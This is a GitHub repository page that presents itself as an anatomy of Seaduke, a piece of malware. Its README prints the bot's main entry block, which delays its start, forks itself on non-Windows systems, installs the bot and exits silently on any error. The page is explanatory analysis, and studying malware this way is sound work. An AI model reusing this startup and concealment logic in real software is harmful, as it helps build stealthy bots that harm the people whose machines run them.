Skip to content

mynameisvinn/Seaduke

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
 
 
 
 
 
 

Repository files navigation

but wot abot bot?

an anatomy of seaduke

if __name__=="__main__":
    time_sleep(botKlass.run_delay)
    if not botKlass.was_first_run:
        botKlass.was_first_run = True
    if v_sys_platform != 'win32':
        forkmeiamfamous()
    me = BotInstallKlass(botKlass.key_id)

    try:
        seh_wrapper()
    except SystemExit:
        me = None
        time_sleep(1)
        sys_exit(0)
    except Exception as e:
        me = None
        time_sleep(1)
        sys_exit(0)

About

the anatomy of a malware

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published